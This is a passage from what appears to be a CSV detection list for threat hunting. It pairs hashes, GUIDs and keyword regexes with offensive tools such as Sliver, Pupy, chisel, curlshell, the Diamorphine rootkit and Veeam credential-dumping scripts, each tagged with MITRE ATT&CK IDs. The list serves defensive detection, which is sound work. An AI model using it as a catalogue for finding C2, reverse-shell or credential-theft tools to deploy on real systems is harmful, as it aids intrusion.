TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*b4rtik/RedPeanut*",".{0,1000}b4rtik\/RedPeanut.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*b4rtik/RedPeanut*",".{0,1000}b4rtik\/RedPeanut.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1095 - T1071.004","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*b501b1a7f5d1ca09fa28d4c2d9e839a5d7e8a9f336d3698c947cac13b02a599a*",".{0,1000}b501b1a7f5d1ca09fa28d4c2d9e839a5d7e8a9f336d3698c947cac13b02a599a.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*B5205EBA-EC32-4C53-86A0-FAEEE7393EC0*",".{0,1000}B5205EBA\-EC32\-4C53\-86A0\-FAEEE7393EC0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*b53fab9c9dfd6eabe8c543a8484f216dba733b3831b4c440cef8064407c343fb*",".{0,1000}b53fab9c9dfd6eabe8c543a8484f216dba733b3831b4c440cef8064407c343fb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b54b60bac7b606297627c36b551aa0dfb1291a73175e98da76014e36839049cd*",".{0,1000}b54b60bac7b606297627c36b551aa0dfb1291a73175e98da76014e36839049cd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b55dd8b809ebb71681cb09b07d6def2ea453d36d25c2a74a4ecac7662c3ddbbd*",".{0,1000}b55dd8b809ebb71681cb09b07d6def2ea453d36d25c2a74a4ecac7662c3ddbbd.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*B5627919-4DFB-49C6-AC1B-C757F4B4A103*",".{0,1000}B5627919\-4DFB\-49C6\-AC1B\-C757F4B4A103.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*",".{0,1000}B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*b5d812b7f5a4a7a3dcb7a2406ce0e9ea3d247179acdf3e2f69124786bc3205c8*",".{0,1000}b5d812b7f5a4a7a3dcb7a2406ce0e9ea3d247179acdf3e2f69124786bc3205c8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b5e23007cc2853e15b55346a3e3088eabdeeab5e61834efe7852b04f0d201455*",".{0,1000}b5e23007cc2853e15b55346a3e3088eabdeeab5e61834efe7852b04f0d201455.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*B5E39D15-9678-474A-9838-4C720243968B*",".{0,1000}B5E39D15\-9678\-474A\-9838\-4C720243968B.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*b61337b16cd16d660ebb308bf91466929d6d85710b595d733c8d11aa7840ec9e*",".{0,1000}b61337b16cd16d660ebb308bf91466929d6d85710b595d733c8d11aa7840ec9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b626f6ca0ff3ed66408fdfe3e31466797b020447209cef538ccecd59b068a504*",".{0,1000}b626f6ca0ff3ed66408fdfe3e31466797b020447209cef538ccecd59b068a504.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b62a1f3b8e0f601e835993277defc6df4912af3db9cbecd1e6dafa0f458926f4*",".{0,1000}b62a1f3b8e0f601e835993277defc6df4912af3db9cbecd1e6dafa0f458926f4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b63d2ec8180679831dea14c5fe8f85018c196d5f38dde79ffcfa839f87729188*",".{0,1000}b63d2ec8180679831dea14c5fe8f85018c196d5f38dde79ffcfa839f87729188.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*B64_ENCODED_PAYLOAD_UUID*",".{0,1000}B64_ENCODED_PAYLOAD_UUID.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b64encode*.:::-989-:::.*",".{0,1000}b64encode.{0,1000}\.\:\:\:\-989\-\:\:\:\..{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*b64payloadgen.sh*",".{0,1000}b64payloadgen\.sh.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","82","15","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*b64stager*",".{0,1000}b64stager.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*B651A53C-FAE6-482E-A590-CA3B48B7F384*",".{0,1000}B651A53C\-FAE6\-482E\-A590\-CA3B48B7F384.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*b670fbc71576142dedbc158f3b6b9e0a5889068759a13b2c8bdc14d1b85074a8*",".{0,1000}b670fbc71576142dedbc158f3b6b9e0a5889068759a13b2c8bdc14d1b85074a8.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*B67143DE-321D-4034-AC1D-C6BB2D98563F*",".{0,1000}B67143DE\-321D\-4034\-AC1D\-C6BB2D98563F.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*B67143DE-321D-4034-AC1D-C6BB2D98563F*",".{0,1000}B67143DE\-321D\-4034\-AC1D\-C6BB2D98563F.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc*",".{0,1000}b683f658cc3320b969164f1dd01ce028c2a2e8f69ed56695415805cb601b96cc.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*b68c9b6c076e1cdd44efd35fefe2f8da26aa4f271ecefce4e70af68acaf7541c*",".{0,1000}b68c9b6c076e1cdd44efd35fefe2f8da26aa4f271ecefce4e70af68acaf7541c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b691b9066d40a8d341e06f30cc7d94c3b1db62b3f49b5869c9b1e59828995550*",".{0,1000}b691b9066d40a8d341e06f30cc7d94c3b1db62b3f49b5869c9b1e59828995550.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*b6c4a39612179674c521ae2c35e3de0b91504adf36928c69e024e0c42e61e74c*",".{0,1000}b6c4a39612179674c521ae2c35e3de0b91504adf36928c69e024e0c42e61e74c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b6d7a37a1e42825a1e744a92fb5e39ada8ef3f71c494370b35b83c77ce06c344*",".{0,1000}b6d7a37a1e42825a1e744a92fb5e39ada8ef3f71c494370b35b83c77ce06c344.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b6d88a58d1da289997258be70427b46ab2c124179a09bab72d3cf25c44c7ad92*",".{0,1000}b6d88a58d1da289997258be70427b46ab2c124179a09bab72d3cf25c44c7ad92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b6ffcd2adfacc8268724e5e8d97904743dcf15152eae87224134df705f916df3*",".{0,1000}b6ffcd2adfacc8268724e5e8d97904743dcf15152eae87224134df705f916df3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b74c431349454dc79731099eebfefca97b6b1d735e6c0269b5a4501e3fee6529*",".{0,1000}b74c431349454dc79731099eebfefca97b6b1d735e6c0269b5a4501e3fee6529.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b74d7e3096956fd4bc7c929c2b482969f13a465058276ee97eb76c1d30529aa4*",".{0,1000}b74d7e3096956fd4bc7c929c2b482969f13a465058276ee97eb76c1d30529aa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b7671f125bb2ed21d0476a00cfaa9ed6*",".{0,1000}b7671f125bb2ed21d0476a00cfaa9ed6.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*b782285888ed48a94f495d3eaa46fe9f29f7bf087197c719792b6e730afb937b*",".{0,1000}b782285888ed48a94f495d3eaa46fe9f29f7bf087197c719792b6e730afb937b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7*",".{0,1000}b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*b7bb45d67e4db4c923cf5e62d0fc8c9ae23abfe214c8daa730d343b0d9205837*",".{0,1000}b7bb45d67e4db4c923cf5e62d0fc8c9ae23abfe214c8daa730d343b0d9205837.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*b7c4eb1c120f959166ad5477119adb92db8081c61193847287a13fec1e780b24*",".{0,1000}b7c4eb1c120f959166ad5477119adb92db8081c61193847287a13fec1e780b24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b7c6bdd822f8710858ed799df49b711001e35901e24ba1726b71987d83cf3e76*",".{0,1000}b7c6bdd822f8710858ed799df49b711001e35901e24ba1726b71987d83cf3e76.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b7c6d0220856790482d617170609b3fb76dfbcf7aaa97dac70767e7896151d86*",".{0,1000}b7c6d0220856790482d617170609b3fb76dfbcf7aaa97dac70767e7896151d86.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b7c7c4caafe06600e68c48eed104ea895a933df2076198e27707af00996c336f*",".{0,1000}b7c7c4caafe06600e68c48eed104ea895a933df2076198e27707af00996c336f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*b7d464d0d52a2c35760aa7cf90a90e1ea3513a8827b175aba5099a90dee416f9*",".{0,1000}b7d464d0d52a2c35760aa7cf90a90e1ea3513a8827b175aba5099a90dee416f9.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*b7e50a98223c9a3008aed3617b5b9282a40b7ef60fc274734d3970c7f9add804*",".{0,1000}b7e50a98223c9a3008aed3617b5b9282a40b7ef60fc274734d3970c7f9add804.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b7f9eb0a95f3523aee8363c59e26a88bcf30d2160db862d4d167945ad342d777*",".{0,1000}b7f9eb0a95f3523aee8363c59e26a88bcf30d2160db862d4d167945ad342d777.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*B7FF0EE8-6C68-46C6-AADB-58C0E3309FB2*",".{0,1000}B7FF0EE8\-6C68\-46C6\-AADB\-58C0E3309FB2.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*b80bb505227429df0b61a07d2ab57c02a48043fbd90d4680192b1698e9a2f37a*",".{0,1000}b80bb505227429df0b61a07d2ab57c02a48043fbd90d4680192b1698e9a2f37a.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*b8285e421d702738eab45670ecae439a7228994e7068b04cb51740e47efbfb41*",".{0,1000}b8285e421d702738eab45670ecae439a7228994e7068b04cb51740e47efbfb41.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*b83141462b74d6d62282551eb34d139eb5c3071516f670af42c1dcc30d6547b2*",".{0,1000}b83141462b74d6d62282551eb34d139eb5c3071516f670af42c1dcc30d6547b2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 